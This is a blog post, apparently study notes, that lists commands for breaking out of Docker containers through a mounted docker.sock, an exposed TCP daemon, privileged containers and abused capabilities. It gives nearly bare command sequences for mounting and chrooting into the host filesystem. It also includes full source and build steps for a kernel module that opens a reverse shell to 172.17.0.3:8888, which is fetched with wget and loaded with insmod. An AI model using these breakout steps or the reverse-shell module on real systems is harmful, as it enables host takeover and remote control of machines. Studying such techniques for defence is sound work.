Container Security-Common issues

A) Docker unix socket mounted in container/Docker tcp socket exposed(Container Breakout-1)-

netstat -a -p --unix | grep docker
docker run -it -v /run/docker.sock:/var/docker.sock --name alpine1 alpine sh
find / -name docker.sock
curl --unix-socket /var/docker.sock -H "Content-Type: application/json" \                                                                                                                                                                 
> -d '{"Image": "alpine", "Cmd": ["echo", "hello world"]}' \
> -X POST http://localhost/v1.41/containers/create
curl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/startcurl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/wait
wget https://download.docker.com/linux/static/stable/x86_64/docker-20.10.9.tgz
tar -xvf docker-20.10.9.tgz
python3 -m http.server 80
curl http://172.17.0.1/docker/docker --output docker_cli
chmod +x docker_cli
./docker_cli -H unix:///var/docker.sock run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash
/usr/sbin/dockerd -H tcp://0.0.0.0:2375
docker -H tcp://0.0.0.0:2375 run --net=host -it ubuntu sh
./docker -H tcp://127.0.0.1:2375 run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash

B) Privileged container or all capabilities allowed(Container breakout-2)-

--privileged OR--cap-add=all
mount /dev/sda1 /mnt
chroot /mnt bash

C) Exploiting capabilities-

ps -aux
cat /proc/1/status | grep Cap
capsh --decode=00000000a80525fb
sudo apt-get install -y build-essential linux-headers-$(uname -r)
hostname -i
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kmod.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
static char command[] = "bash -i >& /dev/tcp/172.17.0.3/8888 0>&1"; //Reverse shell change ip and port if needed

char *argv[] = {
"/bin/bash",
"-c", // flag make command run from option list
command, // Reverse shell
NULL // End of the list
};
static char *envp[] = {
"HOME=/",
NULL // End of the list
};

static int __init connect_back_init(void)
{

return call_usermodehelper(
argv[0], // execution path
argv, // arguments for process
envp, // environment for process
UMH_WAIT_EXEC // don't wait for program return status
);
}

static void __exit connect_back_exit(void)
{
printk(KERN_INFO "Exiting\n");
}

module_init(connect_back_init);
module_exit(connect_back_exit);
obj-m += reverseshell_module.o

all:
make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) modules

clean:
make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) clean
wget http://172.17.0.1:8000/rev_module.ko
chmod +x rev_module.ko; insmod rev_module.ko

Geek👾. Tries to understand how computers work. Would love to hear your suggestions and feedbacks. https://www.linkedin.com/in/pswalia2u/

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Using encrypted passwords in WSO2 Micro Integrator

What is digital security and why is this so important

{UPDATE} Door Slammers Hack Free Resources Generator

MPC Super Activer Bounty Campaign

Weekly update on development process (Sep 20, 2021)

ICYMI: The time to think about IoT security is now!

Rarible vulnerability could deprive users of all NFTs

The Crypto Traveler's x MetaRacers ------------------------------------

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
n00🔑

n00🔑

Geek👾. Tries to understand how computers work. Would love to hear your suggestions and feedbacks. https://www.linkedin.com/in/pswalia2u/

More from Medium

Hack The Box — Remote Write-up

HackTheBox — Previse Walkthrough

Using Java Deserialization to exploit log4shell — LogForge, HTB

TryHackMe | CTF | MyBox